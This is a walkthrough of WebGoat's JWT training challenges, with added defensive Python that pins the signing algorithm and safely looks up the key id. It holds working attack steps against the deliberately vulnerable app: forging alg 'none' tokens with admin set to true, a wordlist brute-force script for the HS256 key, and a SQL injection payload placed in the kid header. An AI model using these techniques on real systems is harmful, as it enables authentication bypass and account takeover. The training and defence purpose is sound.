
JWT Token


Last updated 3 years ago

3/

Decode the token with jwt.io; the payload contains the username.

5/

After decoding, you will see that the algorithm is HS256 and admin is false.

First, change alg to "none". Next, change the admin value to "true".

Edit the cookie and send the request:
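The reason the alg "none" trick works is that the server lets the token's own header choose the algorithm. The following stdlib-only Python snippet is an added example, not code from this writeup or from WebGoat: it puts a verifier that honours the header's alg next to one that pins HS256 server-side, compares the MAC in constant time and enforces exp. All names here (SERVER_KEY, verify_pinned, none_alg_test_vector, rejects) are my own, and the unsigned token is built only as a negative test case.

```python
import base64
import hashlib
import hmac
import json
import secrets
import time
from typing import Optional

# Server-side HMAC key, constructed here. A random 256-bit value like this is
# what an HS256 secret should look like; a dictionary word such as the one
# recovered in challenge 8 can be brute-forced offline in seconds.
SERVER_KEY = secrets.token_bytes(32)


def b64url_decode(segment: str) -> bytes:
    # JWT segments are base64url without padding; restore the padding first
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def sign_hs256(claims: dict, key: bytes) -> str:
    """Mint an HS256 token (stdlib only; written for this example)."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = b64url_encode(json.dumps(claims).encode())
    sig = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url_encode(sig)}"


def none_alg_test_vector(claims: dict) -> str:
    """Unsigned token with alg "none", the shape challenges 5 and 10 submit.
    Used here only as a negative test case for the verifiers below."""
    header = b64url_encode(json.dumps({"alg": "none", "typ": "JWT"}).encode())
    payload = b64url_encode(json.dumps(claims).encode())
    return f"{header}.{payload}."


def verify_trusting_header(token: str, key: bytes) -> dict:
    """Weak verifier: it lets the token's own header pick the algorithm, so a
    header with alg "none" skips the signature check entirely."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") == "none":
        return json.loads(b64url_decode(p))
    expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(p))


def verify_pinned(token: str, key: bytes, now: Optional[int] = None) -> dict:
    """Hardened verifier: the server decides the algorithm, never the token.
    Anything other than HS256 is rejected, the MAC is compared in constant
    time, and exp is mandatory and enforced."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    h, p, s = parts
    header = json.loads(b64url_decode(h))
    if header.get("alg") != "HS256":
        raise ValueError(f"unexpected alg {header.get('alg')!r}")
    expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        raise ValueError("bad signature")
    claims = json.loads(b64url_decode(p))
    now = int(time.time()) if now is None else now
    if "exp" not in claims or now >= int(claims["exp"]):
        raise ValueError("token expired or missing exp")
    return claims


def rejects(verifier, token: str, key: bytes, now: Optional[int] = None) -> bool:
    """True if the verifier refuses the token (so outcomes can be asserted on)."""
    try:
        if now is None:
            verifier(token, key)
        else:
            verifier(token, key, now)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    good = sign_hs256({"username": "Tom", "admin": False, "exp": 2_000_000_000}, SERVER_KEY)
    forged = none_alg_test_vector({"username": "Tom", "admin": True})
    print("weak verifier accepts alg=none :", not rejects(verify_trusting_header, forged, SERVER_KEY))
    print("pinned verifier rejects alg=none:", rejects(verify_pinned, forged, SERVER_KEY))
    print("pinned verifier accepts good    :", verify_pinned(good, SERVER_KEY, now=1_700_000_000)["username"])
```

The fix is not "reject alg none" as a special case but pinning the expected algorithm on the server, which also closes the door on any other algorithm the token might request; a random key of 32 bytes is what keeps the HS256 path safe from the wordlist attack in challenge 8.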

8/

eyJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJXZWJHb2F0IFRva2VuIEJ1aWxkZXIiLCJhdWQiOiJ3ZWJnb2F0Lm9yZyIsImlhdCI6MTY0MDE1MDk3MiwiZXhwIjoxNjQwMTUxMDMyLCJzdWIiOiJ0b21Ad2ViZ29hdC5vcmciLCJ1c2VybmFtZSI6IlRvbSIsIkVtYWlsIjoidG9tQHdlYmdvYXQub3JnIiwiUm9sZSI6WyJNYW5hZ2VyIiwiUHJvamVjdCBBZG1pbmlzdHJhdG9yIl19.dlRNogwJ7D5mrP2ZvXlG5LW1d1U-vqq4DNld1EeN-FA

First, we must find the key of this token; after that, change the username field in the token to 'WebGoat' to solve this challenge (the algorithm is HS256).

I use 1000000-password-seclists.txt as the wordlist for the brute force.

Code to find the key:

import jwt  # PyJWT

# Token from the challenge; the signature is HS256 over header.payload
jwt_str = R'eyJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJXZWJHb2F0IFRva2VuIEJ1aWxkZXIiLCJhdWQiOiJ3ZWJnb2F0Lm9yZyIsImlhdCI6MTY0MDEzOTY5NywiZXhwIjoxNjQwMTM5NzU3LCJzdWIiOiJ0b21Ad2ViZ29hdC5vcmciLCJ1c2VybmFtZSI6IlRvbSIsIkVtYWlsIjoidG9tQHdlYmdvYXQub3JnIiwiUm9sZSI6WyJNYW5hZ2VyIiwiUHJvamVjdCBBZG1pbmlzdHJhdG9yIl19.1XUCWT94XEVfGV1OBGV4cLMJhqCMbzWzZI39I01Exmc'

# errors='ignore': wordlists often contain bytes that are not valid UTF-8
with open('1000000-password-seclists.txt', errors='ignore') as f:
    for line in f:
        key = line.strip()
        try:
            # Only the signature matters here: the token has already expired
            # and carries an "aud" claim, so skip those two claim checks.
            jwt.decode(jwt_str, key, algorithms=['HS256'],
                       options={'verify_exp': False, 'verify_aud': False})
            print('Key found : ', key)
            break
        except jwt.exceptions.InvalidSignatureError:
            continue
    else:
        print("No key found.")

I found that the key is victory; use this key to decode the token and change username to WebGoat:

When we submit, we receive a message that the JWT token is expired:

Change the exp value and submit the token again to solve the challenge:

10/

This challenge is similar to challenge 5.

Open the file logs.txt to get the token:

Intercept the request with Burp Suite; we will see the Authorization header:

We edit the token we got and then use it as the value of the Authorization header:

The algorithm is "None":

Edit the admin field to "true":

Send the request with the new token to solve the challenge:

11/

First, use jwt.io to decode:

In the header, you will see "kid", which differs from the other challenges.

Take a look at the source code on WebGoat's GitHub:

Here we can see that the key is selected from the database where id=kid. We can use SQL injection to make it return our own key:

Something like this works:

' union select 'key' from INFORMATION_SCHEMA.SYSTEM_USERS; --

When the query is executed, the key used to sign the JWT is 'key' (your own key).

But there is one more step: as you can see, before this value is used as the JWT key, it is base64-decoded first:

TextCodec.BASE64.decode(rs.getString(1));

So we must set the value of kid to:

' union select 'a2V5' from INFORMATION_SCHEMA.SYSTEM_USERS; --

And finally, edit username to "Tom", delete exp, and sign with 'key' as the key:

Submit the new token to solve the challenge:
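The root cause in this challenge is that kid, an attacker-controlled header field, is concatenated straight into the SQL that fetches the signing key. As an added example (my code, not the writeup's or WebGoat's), the Python below shows the defensive shape of that lookup: the kid is checked against a strict pattern, bound as a query parameter, and the stored base64 key is decoded with validation, so a kid carrying the payload from this challenge never reaches the database. The in-memory SQLite table, its row, and every name (build_keystore, lookup_key, resolve_key, make_header) are constructed for the example.

```python
import base64
import json
import re
import sqlite3
from typing import Optional

# Strict shape for a key id: short and alphanumeric (plus - and _). Quotes,
# spaces and SQL keywords are refused before any query is built.
KID_PATTERN = re.compile(r"[A-Za-z0-9_-]{1,64}")


def build_keystore() -> sqlite3.Connection:
    """In-memory stand-in for the challenge's key table (constructed here).
    As in WebGoat, the stored key is base64-encoded."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE jwt_keys (id TEXT PRIMARY KEY, key TEXT NOT NULL)")
    conn.execute(
        "INSERT INTO jwt_keys VALUES (?, ?)",
        ("webgoat_key", base64.b64encode(b"example-hmac-key-32-bytes-long!!").decode()),
    )
    conn.commit()
    return conn


def lookup_key(conn: sqlite3.Connection, kid: str) -> bytes:
    """Hardened lookup. The vulnerable pattern concatenates kid into the SQL
    string, so a kid such as the ' union select ... -- payload above makes the
    query return an attacker-chosen value. Here kid is validated first and
    then bound as a parameter, so the database only ever sees it as data."""
    if not KID_PATTERN.fullmatch(kid):
        raise ValueError("kid rejected: unexpected characters")
    row = conn.execute("SELECT key FROM jwt_keys WHERE id = ?", (kid,)).fetchone()
    if row is None:
        raise KeyError("unknown kid")
    # validate=True refuses anything that is not clean base64
    return base64.b64decode(row[0], validate=True)


def make_header(kid: str, alg: str = "HS256") -> str:
    """base64url-encoded JWT header segment (for building sample tokens)."""
    raw = json.dumps({"alg": alg, "kid": kid}).encode()
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def kid_from_token(token: str) -> str:
    """Read kid from the still-unverified header. This value is attacker
    controlled, which is exactly why lookup_key must not trust it."""
    segment = token.split(".")[0]
    header = json.loads(base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4)))
    return str(header.get("kid", ""))


def resolve_key(conn: sqlite3.Connection, token: str) -> Optional[bytes]:
    """Key to verify `token` with, or None if its kid is rejected or unknown.
    The caller must then reject the token outright; falling back to some
    default key would reopen the problem."""
    try:
        return lookup_key(conn, kid_from_token(token))
    except (ValueError, KeyError):
        return None


if __name__ == "__main__":
    db = build_keystore()
    print("valid kid   ->", resolve_key(db, make_header("webgoat_key") + ".e30."))
    injected = "' union select 'a2V5' from INFORMATION_SCHEMA.SYSTEM_USERS; --"
    print("injected kid->", resolve_key(db, make_header(injected) + ".e30."))
```

Parameter binding alone already defeats the injection; the pattern check is there so that a malformed kid is logged and rejected up front instead of producing a silent "unknown key" miss deep in the verifier.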